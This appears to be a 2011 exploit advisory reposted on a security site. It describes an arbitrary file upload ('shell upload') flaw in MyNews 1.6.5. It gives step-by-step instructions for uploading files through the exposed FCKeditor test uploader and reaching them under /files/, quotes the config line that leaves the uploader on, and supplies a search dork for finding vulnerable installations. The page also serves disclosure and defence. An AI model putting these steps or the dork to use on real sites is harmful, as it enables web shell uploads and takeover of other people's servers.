MyNews 1.6.5 Shell Upload

Published
Credit
Risk
2011.07.23
NoGe
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

============================================================================================

[o] MyNews Abritary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/


============================================================================================

[o] Exploit

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse and select file to upload, click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"
ussualy u'r file will be uploaded in this path "/files/your_file.txt"

http://localhost/[path]/files/your_file.txt


FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;


[o] Dork

"Powered by MyNews"

============================================================================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe matthews wishnusakti kaka11 inc0mp13te martfella
pizzyroot Genex H312Y }^-^{ noname tukulesto

============================================================================================

[o] July 22 2011 - Papua, Indonesia


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com